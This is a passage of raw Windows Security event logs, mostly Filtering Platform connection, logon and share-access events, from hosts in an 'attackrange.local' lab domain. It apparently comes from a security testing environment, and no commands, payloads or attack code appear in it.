Source Address: 10.0.1.15
Source Port: 53893
Destination Address: 192.30.255.112
Destination Port: 443
Protocol: 6
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887026
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 4116
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.14
Source Port: 1252
Destination Address: 10.0.1.12
Destination Port: 8000
Protocol: 6
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887025
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 4116
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Source Address: 0.0.0.0
Source Port: 1252
Protocol: 6
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:27:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887028
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2912
Application Name: \device\harddiskvolume1\windows\system32\dns.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.14
Source Port: 55329
Destination Address: 10.0.0.2
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887027
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2912
Application Name: \device\harddiskvolume1\windows\system32\dns.exe
Network Information:
Direction: Inbound
Source Address: 10.0.1.15
Source Port: 51038
Destination Address: 10.0.1.14
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 66848
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278785
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 480
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 51038
Destination Address: 10.0.1.14
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278784
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 480
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 51038
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 38
04/19/2021 06:27:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278783
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 480
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 51038
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:27:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278782
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 4492
Application Name: \device\harddiskvolume1\program files\mozilla firefox\firefox.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 53897
Destination Address: 192.30.255.117
Destination Port: 443
Protocol: 6
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278781
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 4492
Application Name: \device\harddiskvolume1\program files\mozilla firefox\firefox.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 53896
Destination Address: 3.212.187.54
Destination Port: 443
Protocol: 6
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278780
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 4492
Application Name: \device\harddiskvolume1\program files\mozilla firefox\firefox.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 53895
Destination Address: 185.199.111.154
Destination Port: 443
Protocol: 6
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278787
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2236
Application Name: \device\harddiskvolume1\program files\mozilla firefox\firefox.exe
Network Information:
Direction: Inbound
Source Address: 127.0.0.1
Source Port: 53899
Destination Address: 127.0.0.1
Destination Port: 53898
Protocol: 6
Filter Information:
Filter Run-Time ID: 65787
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278786
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2236
Application Name: \device\harddiskvolume1\program files\mozilla firefox\firefox.exe
Network Information:
Direction: Outbound
Source Address: 127.0.0.1
Source Port: 53899
Destination Address: 127.0.0.1
Destination Port: 53898
Protocol: 6
Filter Information:
Filter Run-Time ID: 65789
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5140
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=File Share
OpCode=Info
RecordNumber=887032
Keywords=Audit Success
Message=A network share object was accessed.
Subject:
Security ID: NT AUTHORITY\NETWORK SERVICE
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E4
Network Information:
Object Type: File
Source Address: fe80::118f:34ac:1322:c17e
Source Port: 1253
Share Information:
Share Name: \\*\IPC$
Share Path:
Access Request Information:
Access Mask: 0x1
Accesses: ReadData (or ListDirectory)
04/19/2021 06:27:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887031
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 4
Application Name: System
Network Information:
Direction: Inbound
Source Address: fe80::118f:34ac:1322:c17e
Source Port: 1253
Destination Address: fe80::118f:34ac:1322:c17e
Destination Port: 445
Protocol: 6
Filter Information:
Filter Run-Time ID: 65786
Layer Name: Receive/Accept
Layer Run-Time ID: 46
04/19/2021 06:27:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887030
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 4
Application Name: System
Network Information:
Direction: Outbound
Source Address: fe80::118f:34ac:1322:c17e
Source Port: 1253
Destination Address: fe80::118f:34ac:1322:c17e
Destination Port: 445
Protocol: 6
Filter Information:
Filter Run-Time ID: 65788
Layer Name: Connect
Layer Run-Time ID: 50
04/19/2021 06:27:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887029
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 4
Application Name: System
Network Information:
Source Address: ::
Source Port: 1253
Protocol: 6
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 38
04/19/2021 06:27:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278788
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 3840
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 53900
Destination Address: 10.0.1.12
Destination Port: 8000
Protocol: 6
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:11 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887034
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 4116
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.14
Source Port: 1254
Destination Address: 10.0.1.12
Destination Port: 8000
Protocol: 6
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:11 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887033
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 4116
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Source Address: 0.0.0.0
Source Port: 1254
Protocol: 6
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:27:12 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887046
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2912
Application Name: \device\harddiskvolume1\windows\system32\dns.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.14
Source Port: 53730
Destination Address: 10.0.0.2
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:12 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887045
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2912
Application Name: \device\harddiskvolume1\windows\system32\dns.exe
Network Information:
Direction: Inbound
Source Address: 10.0.1.15
Source Port: 62288
Destination Address: 10.0.1.14
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 66848
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:12 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887044
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2912
Application Name: \device\harddiskvolume1\windows\system32\dns.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.14
Source Port: 55292
Destination Address: 10.0.0.2
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:12 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887043
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2912
Application Name: \device\harddiskvolume1\windows\system32\dns.exe
Network Information:
Direction: Inbound
Source Address: 10.0.1.15
Source Port: 61057
Destination Address: 10.0.1.14
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 66848
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:12 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=887042
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x8CE417
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 06:27:12 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=887041
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8CE417
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {59EBA460-5AD1-E5F1-2935-C9E9C7858E5D}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 1255
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 06:27:12 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=887040
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x8CE417
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 06:27:12 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887039
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 632
Application Name: \device\harddiskvolume1\windows\system32\lsass.exe
Network Information:
Direction: Inbound
Source Address: ::1
Source Port: 1255
Destination Address: ::1
Destination Port: 389
Protocol: 6
Filter Information:
Filter Run-Time ID: 65786
Layer Name: Receive/Accept
Layer Run-Time ID: 46
04/19/2021 06:27:12 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887038
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2752
Application Name: \device\harddiskvolume1\windows\adws\microsoft.activedirectory.webservices.exe
Network Information:
Direction: Outbound
Source Address: ::1
Source Port: 1255
Destination Address: ::1
Destination Port: 389
Protocol: 6
Filter Information:
Filter Run-Time ID: 65788
Layer Name: Connect
Layer Run-Time ID: 50
04/19/2021 06:27:12 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887037
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 2752
Application Name: \device\harddiskvolume1\windows\adws\microsoft.activedirectory.webservices.exe
Network Information:
Source Address: ::
Source Port: 1255
Protocol: 6
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 38
04/19/2021 06:27:12 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887036
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2912
Application Name: \device\harddiskvolume1\windows\system32\dns.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.14
Source Port: 53641
Destination Address: 10.0.0.2
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:12 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887035
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2912
Application Name: \device\harddiskvolume1\windows\system32\dns.exe
Network Information:
Direction: Inbound
Source Address: 10.0.1.15
Source Port: 55575
Destination Address: 10.0.1.14
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 66848
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:12 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278800
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 6596
Application Name: \device\harddiskvolume1\windows\system32\windowspowershell\v1.0\powershell.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 53903
Destination Address: 192.30.255.121
Destination Port: 443
Protocol: 6
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:12 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278799
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 480
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 62288
Destination Address: 10.0.1.14
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:12 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278798
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 480
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 62288
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 38
04/19/2021 06:27:12 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278797
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 480
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 62288
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:27:12 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278796
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 6596
Application Name: \device\harddiskvolume1\windows\system32\windowspowershell\v1.0\powershell.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 53902
Destination Address: 192.30.255.112
Destination Port: 443
Protocol: 6
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:12 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278795
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 480
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 61057
Destination Address: 10.0.1.14
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:12 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278794
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 480
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 61057
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 38
04/19/2021 06:27:12 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278793
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 480
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 61057
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:27:12 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278792
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 6596
Application Name: \device\harddiskvolume1\windows\system32\windowspowershell\v1.0\powershell.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 53901
Destination Address: 185.199.111.133
Destination Port: 443
Protocol: 6
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:12 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278791
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 480
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 55575
Destination Address: 10.0.1.14
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:12 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278790
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 480
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 55575
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 38
04/19/2021 06:27:12 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278789
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 480
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 55575
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:27:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887047
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 92
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: fe80::d02d:b038:b054:4f9e
Source Port: 546
Destination Address: ff02::1:2
Destination Port: 547
Protocol: 17
Filter Information:
Filter Run-Time ID: 70377
Layer Name: Connect
Layer Run-Time ID: 50
04/19/2021 06:27:15 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278804
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 3716
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\bin\splunkd.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 53904
Destination Address: 10.0.1.12
Destination Port: 8089
Protocol: 6
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:15 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278803
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 480
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 60604
Destination Address: 10.0.1.14
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:15 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
